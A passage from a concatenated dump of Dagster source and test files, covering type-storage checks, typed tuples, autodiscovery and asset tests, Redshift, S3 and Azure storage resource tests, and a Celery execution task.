if dagster_type.kind == DagsterTypeKind.LIST:
if dagster_type.kind == DagsterTypeKind.NULLABLE:
outer_type = 'Optional List'
else:
outer_type = 'List'
elif dagster_type.kind == DagsterTypeKind.NULLABLE:
outer_type = 'Optional'
if len(composite_overrides) > 1:
plural = 's'
this = 'These'
has = 'have'
else:
plural = ''
this = 'This'
has = 'has'
check.not_implemented(
'You are attempting to store a {outer_type} containing type{plural} '
'{type_names} in a object store. {this} type{plural} {has} specialized storage '
'behavior (configured in the TYPE_STORAGE_PLUGIN_REGISTRY). We do not '
'currently support storing Nullables or Lists of types with customized '
'storage. See https://github.com/dagster-io/dagster/issues/1190 for '
'details.'.format(
outer_type=outer_type,
plural=plural,
this=this,
has=has,
type_names=', '.join([str(x) for x in composite_overrides]),
)
)
def construct_type_storage_plugin_registry(pipeline_def, system_storage_def):
# Needed to avoid circular dep
from dagster.core.definitions import PipelineDefinition, SystemStorageDefinition
check.inst_param(pipeline_def, 'pipeline_def', PipelineDefinition)
check.inst_param(system_storage_def, 'system_storage_def', SystemStorageDefinition)
type_plugins = []
for type_obj in pipeline_def.all_dagster_types():
for auto_plugin in type_obj.auto_plugins:
if auto_plugin.compatible_with_storage_def(system_storage_def):
type_plugins.append((type_obj, auto_plugin))
return TypeStoragePluginRegistry(type_plugins)
```
#### File: core/types/python_tuple.py
```python
from dagster import check
from dagster.config.config_type import Array, ConfigAnyInstance
from dagster.core.types.dagster_type import DagsterTypeKind
from .config_schema import InputHydrationConfig
from .dagster_type import DagsterType, PythonObjectDagsterType, resolve_dagster_type
PythonTuple = PythonObjectDagsterType(tuple, 'PythonTuple', description='Represents a python tuple')
class TypedTupleInputHydrationConfig(InputHydrationConfig):
def __init__(self, dagster_types):
self._dagster_types = check.list_param(dagster_types, 'dagster_types', of_type=DagsterType)
@property
def schema_type(self):
return Array(ConfigAnyInstance)
def construct_from_config_value(self, context, config_value):
return tuple(
(
self._dagster_types[idx].input_hydration_config.construct_from_config_value(
context, item
)
for idx, item in enumerate(config_value)
)
)
class _TypedPythonTuple(DagsterType):
def __init__(self, dagster_types):
all_have_input_configs = all(
(dagster_type.input_hydration_config for dagster_type in dagster_types)
)
self.dagster_types = dagster_types
super(_TypedPythonTuple, self).__init__(
key='TypedPythonTuple' + '.'.join(map(lambda t: t.key, dagster_types)),
name=None,
input_hydration_config=(
TypedTupleInputHydrationConfig(dagster_types) if all_have_input_configs else None
),
type_check_fn=self.type_check_method,
)
def type_check_method(self, context, value):
from dagster.core.definitions.events import TypeCheck
if not isinstance(value, tuple):
return TypeCheck(
success=False,
description='Value should be a tuple, got a {value_type}'.format(
value_type=type(value)
),
)
if len(value) != len(self.dagster_types):
return TypeCheck(
success=False,
description=(
                    'Tuple with key {key} requires {n} entries, received {m} values'
).format(key=self.key, n=len(self.dagster_types), m=len(value)),
)
for item, dagster_type in zip(value, self.dagster_types):
item_check = dagster_type.type_check(context, item)
if not item_check.success:
return item_check
return TypeCheck(success=True)
@property
def display_name(self):
return 'Tuple[{}]'.format(
','.join([inner_type.display_name for inner_type in self.dagster_types])
)
@property
def inner_types(self):
return self.dagster_types
@property
def type_param_keys(self):
return [dt.key for dt in self.dagster_types]
def create_typed_tuple(*dagster_type_args):
dagster_types = list(map(resolve_dagster_type, dagster_type_args))
check.invariant(
not any((dagster_type.kind == DagsterTypeKind.NOTHING for dagster_type in dagster_types)),
'Cannot create a runtime tuple containing inner type Nothing. Use List for fan-in',
)
return _TypedPythonTuple(dagster_types)
class DagsterTupleApi:
def __getitem__(self, tuple_types):
check.not_none_param(tuple_types, 'tuple_types')
if isinstance(tuple_types, tuple):
return create_typed_tuple(*tuple_types)
else:
return create_typed_tuple(tuple_types)
Tuple = DagsterTupleApi()
```
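A short sketch (the chosen inner types are an assumption, not from the original tests) of how the `Tuple` API above builds a typed tuple, assuming the module path follows the file header:
```python
from dagster import Int, String
from dagster.core.types.python_tuple import Tuple  # path assumed
MyPair = Tuple[Int, String]       # DagsterTupleApi.__getitem__ -> create_typed_tuple(Int, String)
print(MyPair.display_name)        # e.g. 'Tuple[Int,String]'
print(MyPair.type_param_keys)     # keys of the resolved inner dagster types
```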
#### File: workspace_tests/autodiscovery_tests/test_autodiscovery.py
```python
import pytest
from dagster import DagsterInvariantViolationError, RepositoryDefinition
from dagster.cli.workspace.autodiscovery import (
loadable_targets_from_python_file,
loadable_targets_from_python_module,
)
from dagster.core.code_pointer import CodePointer
from dagster.core.definitions.reconstructable import repository_def_from_pointer
from dagster.utils import file_relative_path
def test_single_repository():
single_repo_path = file_relative_path(__file__, 'single_repository.py')
loadable_targets = loadable_targets_from_python_file(single_repo_path)
assert len(loadable_targets) == 1
symbol = loadable_targets[0].attribute
assert symbol == 'single_repository'
repo_def = CodePointer.from_python_file(single_repo_path, symbol).load_target()
    assert isinstance(repo_def, RepositoryDefinition)
assert repo_def.name == 'single_repository'
def test_double_repository():
loadable_repos = loadable_targets_from_python_file(
file_relative_path(__file__, 'double_repository.py'),
)
assert set([lr.target_definition.name for lr in loadable_repos]) == {'repo_one', 'repo_two'}
def test_single_pipeline():
single_pipeline_path = file_relative_path(__file__, 'single_pipeline.py')
loadable_targets = loadable_targets_from_python_file(single_pipeline_path)
assert len(loadable_targets) == 1
symbol = loadable_targets[0].attribute
assert symbol == 'a_pipeline'
repo_def = repository_def_from_pointer(
CodePointer.from_python_file(single_pipeline_path, symbol)
)
    assert isinstance(repo_def, RepositoryDefinition)
assert repo_def.get_pipeline('a_pipeline')
def test_double_pipeline():
double_pipeline_path = file_relative_path(__file__, 'double_pipeline.py')
with pytest.raises(DagsterInvariantViolationError) as exc_info:
loadable_targets_from_python_file(double_pipeline_path)
assert str(exc_info.value) == (
"No repository and more than one pipeline found in \"double_pipeline\". "
"If you load a file or module directly it must either have one repository "
"or one pipeline in scope. Found pipelines defined in variables or decorated "
"functions: ['pipe_one', 'pipe_two']."
)
def test_nada():
with pytest.raises(DagsterInvariantViolationError) as exc_info:
loadable_targets_from_python_file(file_relative_path(__file__, 'nada.py'))
assert str(exc_info.value) == 'No pipelines or repositories found in "nada".'
def test_single_repository_in_module():
loadable_targets = loadable_targets_from_python_module(
'dagster.utils.test.toys.single_repository'
)
assert len(loadable_targets) == 1
symbol = loadable_targets[0].attribute
assert symbol == 'single_repository'
repo_def = CodePointer.from_module(
'dagster.utils.test.toys.single_repository', symbol
).load_target()
    assert isinstance(repo_def, RepositoryDefinition)
assert repo_def.name == 'single_repository'
```
#### File: core_tests/storage_tests/test_assets.py
```python
from contextlib import contextmanager
import pytest
from dagster import (
AssetKey,
DagsterEventType,
Materialization,
Output,
execute_pipeline,
pipeline,
seven,
solid,
)
from dagster.core.events.log import EventRecord
from dagster.core.instance import DagsterInstance, InstanceType
from dagster.core.launcher.sync_in_memory_run_launcher import SyncInMemoryRunLauncher
from dagster.core.storage.event_log import (
ConsolidatedSqliteEventLogStorage,
InMemoryEventLogStorage,
)
from dagster.core.storage.noop_compute_log_manager import NoOpComputeLogManager
from dagster.core.storage.root import LocalArtifactStorage
from dagster.core.storage.runs import InMemoryRunStorage
def get_instance(temp_dir, event_log_storage):
return DagsterInstance(
instance_type=InstanceType.EPHEMERAL,
local_artifact_storage=LocalArtifactStorage(temp_dir),
run_storage=InMemoryRunStorage(),
event_storage=event_log_storage,
compute_log_manager=NoOpComputeLogManager(),
run_launcher=SyncInMemoryRunLauncher(),
)
@contextmanager
def create_in_memory_event_log_instance():
with seven.TemporaryDirectory() as temp_dir:
asset_storage = InMemoryEventLogStorage()
instance = get_instance(temp_dir, asset_storage)
yield [instance, asset_storage]
@contextmanager
def create_consolidated_sqlite_event_log_instance():
with seven.TemporaryDirectory() as temp_dir:
asset_storage = ConsolidatedSqliteEventLogStorage(temp_dir)
instance = get_instance(temp_dir, asset_storage)
yield [instance, asset_storage]
asset_test = pytest.mark.parametrize(
'asset_aware_context',
[create_in_memory_event_log_instance, create_consolidated_sqlite_event_log_instance,],
)
@solid
def solid_one(_):
yield Materialization(label='one', asset_key=AssetKey('asset_1'))
yield Output(1)
@solid
def solid_two(_):
yield Materialization(label='two', asset_key=AssetKey('asset_2'))
yield Materialization(label='three', asset_key=AssetKey(['path', 'to', 'asset_3']))
yield Output(1)
@solid
def solid_normalization(_):
yield Materialization(label='normalization', asset_key='path/to-asset_4')
yield Output(1)
@pipeline
def pipeline_one():
solid_one()
@pipeline
def pipeline_two():
solid_one()
solid_two()
@pipeline
def pipeline_normalization():
solid_normalization()
@asset_test
def test_asset_keys(asset_aware_context):
with asset_aware_context() as ctx:
instance, event_log_storage = ctx
execute_pipeline(pipeline_one, instance=instance)
execute_pipeline(pipeline_two, instance=instance)
asset_keys = event_log_storage.get_all_asset_keys()
assert len(asset_keys) == 3
assert set([asset_key.to_db_string() for asset_key in asset_keys]) == set(
['asset_1', 'asset_2', 'path.to.asset_3']
)
@asset_test
def test_asset_events(asset_aware_context):
with asset_aware_context() as ctx:
instance, event_log_storage = ctx
execute_pipeline(pipeline_one, instance=instance)
execute_pipeline(pipeline_two, instance=instance)
asset_events = event_log_storage.get_asset_events(AssetKey('asset_1'))
assert len(asset_events) == 2
for event in asset_events:
assert isinstance(event, EventRecord)
assert event.is_dagster_event
assert event.dagster_event.event_type == DagsterEventType.STEP_MATERIALIZATION
assert event.dagster_event.asset_key
asset_events = event_log_storage.get_asset_events(AssetKey(['path', 'to', 'asset_3']))
assert len(asset_events) == 1
@asset_test
def test_asset_run_ids(asset_aware_context):
with asset_aware_context() as ctx:
instance, event_log_storage = ctx
one = execute_pipeline(pipeline_one, instance=instance)
two = execute_pipeline(pipeline_two, instance=instance)
run_ids = event_log_storage.get_asset_run_ids(AssetKey('asset_1'))
assert set(run_ids) == set([one.run_id, two.run_id])
@asset_test
def test_asset_normalization(asset_aware_context):
with asset_aware_context() as ctx:
instance, event_log_storage = ctx
execute_pipeline(pipeline_normalization, instance=instance)
asset_keys = event_log_storage.get_all_asset_keys()
assert len(asset_keys) == 1
asset_key = asset_keys[0]
assert asset_key.to_db_string() == 'path.to.asset_4'
assert asset_key.path == ['path', 'to', 'asset_4']
```
#### File: dagster_tests/core_tests/test_output_definition.py
```python
from dagster import OutputDefinition
def test_output_definition():
    output_definition_onlyreq = OutputDefinition(dagster_type=int, name='result', is_required=True)
    assert output_definition_onlyreq.optional is False
    output_definition_none = OutputDefinition(dagster_type=int, name='result')
    assert output_definition_none.optional is False
```
#### File: dagster_graphql_tests/graphql/test_dagster_environment.py
```python
from dagster.core.code_pointer import FileCodePointer
from dagster.core.host_representation import PythonEnvRepositoryLocation, RepositoryLocationHandle
from dagster.utils import file_relative_path
def test_dagster_out_of_process_location():
env = PythonEnvRepositoryLocation(
RepositoryLocationHandle.create_out_of_process_location(
location_name='test_location',
repository_code_pointer_dict={
'test_repo': FileCodePointer(file_relative_path(__file__, 'setup.py'), 'test_repo'),
},
)
)
assert env.get_repository('test_repo')
```
#### File: dagster_aws_tests/redshift_tests/test_resources.py
```python
import os
import uuid
import boto3
import psycopg2
import pytest
from dagster_aws.redshift import FakeRedshiftResource, fake_redshift_resource, redshift_resource
from dagster import ModeDefinition, execute_solid, solid
from dagster.seven import mock
REDSHIFT_ENV = {
'resources': {
'redshift': {
'config': {
'host': 'foo',
'port': 5439,
'user': 'dagster',
'password': '<PASSWORD>',
'database': 'dev',
'schema': 'foobar',
}
}
}
}
QUERY_RESULT = [(1,)]
def mock_execute_query_conn(*_args, **_kwargs):
cursor_mock = mock.MagicMock(rowcount=1)
cursor_mock.fetchall.return_value = QUERY_RESULT
conn = mock.MagicMock(is_conn='yup')
conn.cursor.return_value.__enter__.return_value = cursor_mock
m = mock.MagicMock()
m.return_value.__enter__.return_value = conn
m.return_value = conn
return m
@solid(required_resource_keys={'redshift'})
def single_redshift_solid(context):
assert context.resources.redshift
return context.resources.redshift.execute_query('SELECT 1', fetch_results=True)
@solid(required_resource_keys={'redshift'})
def multi_redshift_solid(context):
assert context.resources.redshift
return context.resources.redshift.execute_queries(
['SELECT 1', 'SELECT 1', 'SELECT 1'], fetch_results=True
)
@mock.patch('psycopg2.connect', new_callable=mock_execute_query_conn)
def test_single_select(redshift_connect):
result = execute_solid(
single_redshift_solid,
run_config=REDSHIFT_ENV,
mode_def=ModeDefinition(resource_defs={'redshift': redshift_resource}),
)
redshift_connect.assert_called_once_with(
host='foo',
port=5439,
user='dagster',
password='<PASSWORD>',
database='dev',
schema='foobar',
connect_timeout=5,
sslmode='require',
)
assert result.success
assert result.output_value() == QUERY_RESULT
@mock.patch('psycopg2.connect', new_callable=mock_execute_query_conn)
def test_multi_select(_redshift_connect):
result = execute_solid(
multi_redshift_solid,
run_config=REDSHIFT_ENV,
mode_def=ModeDefinition(resource_defs={'redshift': redshift_resource}),
)
assert result.success
assert result.output_value() == [QUERY_RESULT] * 3
def test_fake_redshift():
fake_mode = ModeDefinition(resource_defs={'redshift': fake_redshift_resource})
result = execute_solid(single_redshift_solid, run_config=REDSHIFT_ENV, mode_def=fake_mode)
assert result.success
assert result.output_value() == FakeRedshiftResource.QUERY_RESULT
result = execute_solid(multi_redshift_solid, run_config=REDSHIFT_ENV, mode_def=fake_mode)
assert result.success
assert result.output_value() == [FakeRedshiftResource.QUERY_RESULT] * 3
REDSHIFT_CREATE_TABLE_QUERY = '''CREATE TABLE IF NOT EXISTS VENUE1(
VENUEID SMALLINT,
VENUENAME VARCHAR(100),
VENUECITY VARCHAR(30),
VENUESTATE CHAR(2),
VENUESEATS INTEGER
) DISTSTYLE EVEN;
'''
REDSHIFT_LOAD_FILE_CONTENTS = b'''
7|BMO Field|Toronto|ON|0
16|TD Garden|Boston|MA|0
23|The Palace of Auburn Hills|Auburn Hills|MI|0
28|American Airlines Arena|Miami|FL|0
37|Staples Center|Los Angeles|CA|0
42|FedExForum|Memphis|TN|0
52|PNC Arena|Raleigh|NC ,25 |0
59|Scotiabank Saddledome|Calgary|AB|0
66|SAP Center|San Jose|CA|0
73|Heinz Field|Pittsburgh|PA|65050
'''.strip()
REDSHIFT_FAILED_LOAD_QUERY = '''
SELECT le.query,
TRIM(le.err_reason) AS err_reason,
TRIM(le.filename) AS filename,
le.line_number AS line_number,
le.raw_line AS raw_line,
le.raw_field_value AS raw_value
FROM stl_load_errors le
WHERE le.query
AND le.query = pg_last_copy_id()
LIMIT 1;
'''
@pytest.mark.skipif(
'AWS_REDSHIFT_TEST_DO_IT_LIVE' not in os.environ,
reason='This test only works with a live Redshift cluster',
)
def test_live_redshift(s3_bucket):
'''
This test is based on:
https://aws.amazon.com/premiumsupport/knowledge-center/redshift-stl-load-errors/
Requires the following environment variables:
AWS_ACCOUNT_ID - AWS account ID to use
REDSHIFT_LOAD_IAM_ROLE - IAM role to use for Redshift load
REDSHIFT_ENDPOINT - Redshift URL
REDSHIFT_PASSWORD - <PASSWORD>
'''
# Put file to load on S3
file_key = uuid.uuid4().hex
client = boto3.client('s3')
client.put_object(Body=REDSHIFT_LOAD_FILE_CONTENTS, Bucket=s3_bucket, Key=file_key)
@solid(required_resource_keys={'redshift'})
def query(context):
assert context.resources.redshift
# First, create table:
context.resources.redshift.execute_query(REDSHIFT_CREATE_TABLE_QUERY)
def error_callback(error, cursor, _log):
assert (
str(error).strip()
== "Load into table 'venue1' failed. Check 'stl_load_errors' system table for details."
)
cursor.execute(REDSHIFT_FAILED_LOAD_QUERY)
res = cursor.fetchall()
assert res[0][1] == 'Char length exceeds DDL length'
assert res[0][2] == 's3://{s3_bucket}/{file_key}'.format(
s3_bucket=s3_bucket, file_key=file_key
)
assert res[0][3] == 7
assert res[0][4].strip() == '52|PNC Arena|Raleigh|NC ,25 |0'
assert res[0][5].strip() == 'NC ,25'
raise error
return context.resources.redshift.execute_query(
'''COPY venue1 FROM 's3://{s3_bucket}/{file_key}'
IAM_ROLE 'arn:aws:iam::{AWS_ACCOUNT_ID}:role/{REDSHIFT_LOAD_IAM_ROLE}'
DELIMITER '|';
'''.format(
s3_bucket=s3_bucket,
file_key=file_key,
AWS_ACCOUNT_ID=os.environ['AWS_ACCOUNT_ID'],
REDSHIFT_LOAD_IAM_ROLE=os.environ['REDSHIFT_LOAD_IAM_ROLE'],
),
fetch_results=True,
error_callback=error_callback,
)
with pytest.raises(psycopg2.InternalError):
execute_solid(
query,
run_config={
'resources': {
'redshift': {
'config': {
'host': {'env': 'REDSHIFT_ENDPOINT'},
'port': 5439,
'user': 'dagster',
'password': {'env': '<PASSWORD>'},
'database': 'dev',
}
}
}
},
mode_def=ModeDefinition(resource_defs={'redshift': redshift_resource}),
)
```
#### File: dagster_aws_tests/s3_tests/test_s3_file_cache.py
```python
import io
import boto3
from dagster_aws.s3 import S3FileCache, S3FileHandle
from moto import mock_s3
@mock_s3
def test_s3_file_cache_file_not_present():
s3 = boto3.client('s3')
s3.create_bucket(Bucket='some-bucket')
file_store = S3FileCache(
s3_bucket='some-bucket', s3_key='some-key', s3_session=s3, overwrite=False
)
assert not file_store.has_file_object('foo')
@mock_s3
def test_s3_file_cache_file_present():
s3 = boto3.client('s3')
s3.create_bucket(Bucket='some-bucket')
file_store = S3FileCache(
s3_bucket='some-bucket', s3_key='some-key', s3_session=s3, overwrite=False
)
assert not file_store.has_file_object('foo')
file_store.write_binary_data('foo', 'bar'.encode())
assert file_store.has_file_object('foo')
@mock_s3
def test_s3_file_cache_correct_handle():
s3 = boto3.client('s3')
s3.create_bucket(Bucket='some-bucket')
file_store = S3FileCache(
s3_bucket='some-bucket', s3_key='some-key', s3_session=s3, overwrite=False
)
assert isinstance(file_store.get_file_handle('foo'), S3FileHandle)
@mock_s3
def test_s3_file_cache_write_file_object():
s3 = boto3.client('s3')
s3.create_bucket(Bucket='some-bucket')
file_store = S3FileCache(
s3_bucket='some-bucket', s3_key='some-key', s3_session=s3, overwrite=False
)
stream = io.BytesIO('content'.encode())
file_store.write_file_object('foo', stream)
```
#### File: dagster_azure/adls2/utils.py
```python
import warnings
try:
# Centralise Azure imports here so we only need to warn in one place
from azure.core.exceptions import ResourceNotFoundError # pylint: disable=unused-import
from azure.storage.filedatalake import DataLakeServiceClient
except ImportError:
msg = (
"Could not import required Azure objects. This probably means you have an old version "
"of azure-storage-blob installed. dagster-azure requires azure-storage-blob~=12.0.0; "
"this conflicts with dagster-snowflake which requires azure-storage-blob<12.0.0 and is "
"incompatible. Please uninstall dagster-snowflake and reinstall dagster-azure to fix "
"this error."
)
warnings.warn(msg)
raise
def _create_url(storage_account, subdomain):
return "https://{}.{}.core.windows.net/".format(storage_account, subdomain)
def create_adls2_client(storage_account, credential):
"""
Create an ADLS2 client.
"""
account_url = _create_url(storage_account, "dfs")
return DataLakeServiceClient(account_url, credential)
__all__ = ['create_adls2_client', 'DataLakeServiceClient', 'ResourceNotFoundError']
```
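Illustrative only (the storage account name is an assumption): the helper above composes the Data Lake endpoint from the account name and the `dfs` subdomain.
```python
from dagster_azure.adls2.utils import _create_url
assert _create_url('myaccount', 'dfs') == 'https://myaccount.dfs.core.windows.net/'
```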
#### File: dagster_azure/blob/utils.py
```python
import warnings
try:
# Centralise Azure imports here so we only need to warn in one place
from azure.core.exceptions import ResourceNotFoundError
from azure.storage.blob import (
generate_blob_sas,
BlobServiceClient,
)
except ImportError:
msg = (
"Could not import required Azure objects. This probably means you have an old version "
"of azure-storage-blob installed. dagster-azure requires azure-storage-blob~=12.0.0; "
"this conflicts with dagster-snowflake which requires azure-storage-blob<12.0.0 and is "
"incompatible. Please uninstall dagster-snowflake and reinstall dagster-azure to fix "
"this error."
)
warnings.warn(msg)
raise
def _create_url(storage_account, subdomain):
return "https://{}.{}.core.windows.net/".format(storage_account, subdomain)
def create_blob_client(storage_account, credential):
"""
Create a Blob Storage client.
"""
account_url = _create_url(storage_account, "blob")
if hasattr(credential, "account_key"):
credential = credential.account_key
return BlobServiceClient(account_url, credential)
__all__ = ['create_blob_client', 'generate_blob_sas', 'BlobServiceClient', 'ResourceNotFoundError']
```
#### File: dagster_azure_tests/adls2_tests/test_adls2_file_cache.py
```python
import io
from dagster_azure.adls2 import ADLS2FileCache, ADLS2FileHandle, FakeADLS2ServiceClient
def test_adls2_file_cache_file_not_present(storage_account, file_system, credential):
fake_client = FakeADLS2ServiceClient(storage_account, credential)
file_store = ADLS2FileCache(
storage_account=storage_account,
file_system=file_system,
prefix='some-prefix',
client=fake_client,
overwrite=False,
)
assert not file_store.has_file_object('foo')
def test_adls2_file_cache_file_present(storage_account, file_system, credential):
fake_client = FakeADLS2ServiceClient(storage_account, credential)
file_store = ADLS2FileCache(
storage_account=storage_account,
file_system=file_system,
prefix='some-prefix',
client=fake_client,
overwrite=False,
)
assert not file_store.has_file_object('foo')
file_store.write_binary_data('foo', 'bar'.encode())
assert file_store.has_file_object('foo')
def test_adls2_file_cache_correct_handle(storage_account, file_system, credential):
fake_client = FakeADLS2ServiceClient(storage_account, credential)
file_store = ADLS2FileCache(
storage_account=storage_account,
file_system=file_system,
prefix='some-prefix',
client=fake_client,
overwrite=False,
)
assert isinstance(file_store.get_file_handle('foo'), ADLS2FileHandle)
def test_adls2_file_cache_write_file_object(storage_account, file_system, credential):
fake_client = FakeADLS2ServiceClient(storage_account, credential)
file_store = ADLS2FileCache(
storage_account=storage_account,
file_system=file_system,
prefix='some-prefix',
client=fake_client,
overwrite=False,
)
stream = io.BytesIO('content'.encode())
file_store.write_file_object('foo', stream)
```
#### File: dagster_azure_tests/adls2_tests/test_adls2_file_manager.py
```python
import uuid
from dagster_azure.adls2 import (
ADLS2FileHandle,
ADLS2FileManager,
FakeADLS2Resource,
adls2_plus_default_storage_defs,
)
from dagster import (
InputDefinition,
Int,
ModeDefinition,
OutputDefinition,
ResourceDefinition,
execute_pipeline,
pipeline,
solid,
)
from dagster.seven import mock
# For deps
def test_adls2_file_manager_write(storage_account, file_system):
file_mock = mock.MagicMock()
adls2_mock = mock.MagicMock()
adls2_mock.get_file_client.return_value = file_mock
adls2_mock.account_name = storage_account
file_manager = ADLS2FileManager(adls2_mock, file_system, 'some-key')
foo_bytes = 'foo'.encode()
file_handle = file_manager.write_data(foo_bytes)
assert isinstance(file_handle, ADLS2FileHandle)
assert file_handle.account == storage_account
assert file_handle.file_system == file_system
assert file_handle.key.startswith('some-key/')
assert file_mock.upload_data.call_count == 1
file_handle = file_manager.write_data(foo_bytes, ext='foo')
assert isinstance(file_handle, ADLS2FileHandle)
assert file_handle.account == storage_account
assert file_handle.file_system == file_system
assert file_handle.key.startswith('some-key/')
assert file_handle.key[-4:] == '.foo'
assert file_mock.upload_data.call_count == 2
def test_adls2_file_manager_read(storage_account, file_system):
state = {'called': 0}
bar_bytes = 'bar'.encode()
class DownloadMock(mock.MagicMock):
def readinto(self, fileobj):
fileobj.write(bar_bytes)
class FileMock(mock.MagicMock):
def download_file(self):
state['called'] += 1
assert state['called'] == 1
return DownloadMock(file=self)
class ADLS2Mock(mock.MagicMock):
def get_file_client(self, *_args, **kwargs):
state['file_system'] = kwargs['file_system']
file_path = kwargs['file_path']
state['file_path'] = kwargs['file_path']
return FileMock(file_path=file_path)
adls2_mock = ADLS2Mock()
file_manager = ADLS2FileManager(adls2_mock, file_system, 'some-key')
file_handle = ADLS2FileHandle(storage_account, file_system, 'some-key/kdjfkjdkfjkd')
with file_manager.read(file_handle) as file_obj:
assert file_obj.read() == bar_bytes
assert state['file_system'] == file_handle.file_system
assert state['file_path'] == file_handle.key
# read again. cached
with file_manager.read(file_handle) as file_obj:
assert file_obj.read() == bar_bytes
file_manager.delete_local_temp()
def test_depends_on_adls2_resource_intermediates(storage_account, file_system):
@solid(
input_defs=[InputDefinition('num_one', Int), InputDefinition('num_two', Int)],
output_defs=[OutputDefinition(Int)],
)
def add_numbers(_, num_one, num_two):
return num_one + num_two
adls2_fake_resource = FakeADLS2Resource(storage_account)
@pipeline(
mode_defs=[
ModeDefinition(
system_storage_defs=adls2_plus_default_storage_defs,
resource_defs={'adls2': ResourceDefinition.hardcoded_resource(adls2_fake_resource)},
)
]
)
def adls2_internal_pipeline():
return add_numbers()
result = execute_pipeline(
adls2_internal_pipeline,
environment_dict={
'solids': {
'add_numbers': {'inputs': {'num_one': {'value': 2}, 'num_two': {'value': 4}}}
},
'storage': {'adls2': {'config': {'adls2_file_system': file_system}}},
},
)
assert result.success
assert result.result_for_solid('add_numbers').output_value() == 6
assert file_system in adls2_fake_resource.adls2_client.file_systems
keys = set()
for step_key, output_name in [('add_numbers.compute', 'result')]:
keys.add(create_adls2_key(result.run_id, step_key, output_name))
assert set(adls2_fake_resource.adls2_client.file_systems[file_system].keys()) == keys
def create_adls2_key(run_id, step_key, output_name):
return 'dagster/storage/{run_id}/intermediates/{step_key}/{output_name}'.format(
run_id=run_id, step_key=step_key, output_name=output_name
)
def test_depends_on_adls2_resource_file_manager(storage_account, file_system):
bar_bytes = 'bar'.encode()
@solid(output_defs=[OutputDefinition(ADLS2FileHandle)])
def emit_file(context):
return context.file_manager.write_data(bar_bytes)
@solid(input_defs=[InputDefinition('file_handle', ADLS2FileHandle)])
def accept_file(context, file_handle):
local_path = context.file_manager.copy_handle_to_local_temp(file_handle)
assert isinstance(local_path, str)
assert open(local_path, 'rb').read() == bar_bytes
adls2_fake_resource = FakeADLS2Resource(storage_account)
@pipeline(
mode_defs=[
ModeDefinition(
system_storage_defs=adls2_plus_default_storage_defs,
resource_defs={'adls2': ResourceDefinition.hardcoded_resource(adls2_fake_resource)},
)
]
)
def adls2_file_manager_test():
accept_file(emit_file())
result = execute_pipeline(
adls2_file_manager_test,
environment_dict={'storage': {'adls2': {'config': {'adls2_file_system': file_system}}}},
)
assert result.success
keys_in_bucket = set(adls2_fake_resource.adls2_client.file_systems[file_system].keys())
for step_key, output_name in [
('emit_file.compute', 'result'),
('accept_file.compute', 'result'),
]:
keys_in_bucket.remove(create_adls2_key(result.run_id, step_key, output_name))
assert len(keys_in_bucket) == 1
file_key = list(keys_in_bucket)[0]
comps = file_key.split('/')
assert '/'.join(comps[:-1]) == 'dagster/storage/{run_id}/files'.format(run_id=result.run_id)
assert uuid.UUID(comps[-1])
```
#### File: dagster_azure_tests/adls2_tests/test_object_store.py
```python
from dagster_azure.adls2 import ADLS2ObjectStore, FakeADLS2ServiceClient
from dagster_azure.blob import FakeBlobServiceClient
from dagster.core.storage.object_store import DEFAULT_SERIALIZATION_STRATEGY
def test_adls2_object_store(
storage_account, credential, file_system, caplog
): # pylint: disable=too-many-function-args
adls2_fake_client = FakeADLS2ServiceClient(storage_account, credential)
blob_fake_client = FakeBlobServiceClient(storage_account, credential)
key = 'foo'
# Uses mock ADLS2 client
adls2_obj_store = ADLS2ObjectStore(
file_system, adls2_client=adls2_fake_client, blob_client=blob_fake_client
)
res = adls2_obj_store.set_object(key, True, DEFAULT_SERIALIZATION_STRATEGY)
assert res.key == 'abfss://{fs}@{account}.dfs.core.windows.net/{key}'.format(
fs=file_system, account=storage_account, key=key
)
adls2_obj_store.set_object(key, True, DEFAULT_SERIALIZATION_STRATEGY)
assert 'Removing existing ADLS2 key' in caplog.text
assert adls2_obj_store.has_object(key)
assert adls2_obj_store.get_object(key, DEFAULT_SERIALIZATION_STRATEGY).obj is True
    # Harder to test this since it requires a fake synchronised Blob client: cp_object uses
    # blob APIs to communicate...
# adls2_obj_store.cp_object(key, 'bar')
# assert adls2_obj_store.has_object('bar')
adls2_obj_store.rm_object(key)
assert not adls2_obj_store.has_object(key)
assert adls2_obj_store.uri_for_key(
key
) == 'abfss://{fs}@{account}.dfs.core.windows.net/{key}'.format(
fs=file_system, account=storage_account, key=key
)
```
#### File: dagster-celery/dagster_celery/tasks.py
```python
import hashlib
import six
from celery import Celery
from celery.utils.collections import force_mapping
from dagster_celery.config import CeleryConfig, CeleryK8sJobConfig
from dagster_graphql.client.mutations import handle_execute_plan_result, handle_execution_errors
from dagster_graphql.client.util import parse_raw_log_lines
from kombu import Queue
from dagster import DagsterInstance, EventMetadataEntry, check, seven
from dagster.core.definitions.reconstructable import ReconstructablePipeline
from dagster.core.events import EngineEventData
from dagster.core.execution.api import create_execution_plan, execute_plan_iterator
from dagster.core.execution.retries import Retries
from dagster.core.instance import InstanceRef
from dagster.serdes import serialize_dagster_namedtuple
from dagster.seven import is_module_available
from .engine import DELEGATE_MARKER, CeleryEngine, CeleryK8sJobEngine
def create_task(celery_app, **task_kwargs):
@celery_app.task(bind=True, name='execute_plan', **task_kwargs)
def _execute_plan(_self, instance_ref_dict, executable_dict, run_id, step_keys, retries_dict):
check.dict_param(instance_ref_dict, 'instance_ref_dict')
check.dict_param(executable_dict, 'executable_dict')
check.str_param(run_id, 'run_id')
check.list_param(step_keys, 'step_keys', of_type=str)
check.dict_param(retries_dict, 'retries_dict')
instance_ref = InstanceRef.from_dict(instance_ref_dict)
instance = DagsterInstance.from_ref(instance_ref)
pipeline = ReconstructablePipeline.from_dict(executable_dict)
retries = Retries.from_config(retries_dict)
pipeline_run = instance.get_run_by_id(run_id)
check.invariant(pipeline_run, 'Could not load run {}'.format(run_id))
step_keys_str = ", ".join(step_keys)
execution_plan = create_execution_plan(
pipeline,
pipeline_run.environment_dict,
mode=pipeline_run.mode,
step_keys_to_execute=pipeline_run.step_keys_to_execute,
).build_subset_plan(step_keys)
engine_event = instance.report_engine_event(
'Executing steps {} in celery worker'.format(step_keys_str),
pipeline_run,
EngineEventData(
[EventMetadataEntry.text(step_keys_str, 'step_keys'),], marker_end=DELEGATE_MARKER,
),
CeleryEngine,
step_key=execution_plan.step_key_for_single_step_plans(),
)
events = [engine_event]
for step_event in execute_plan_iterator(
execution_plan,
pipeline_run=pipeline_run,
environment_dict=pipeline_run.environment_dict,
instance=instance,
retries=retries,
):
events.append(step_event)
serialized_events = [serialize_dagster_namedtuple(event) for event in events]
return serialized_events
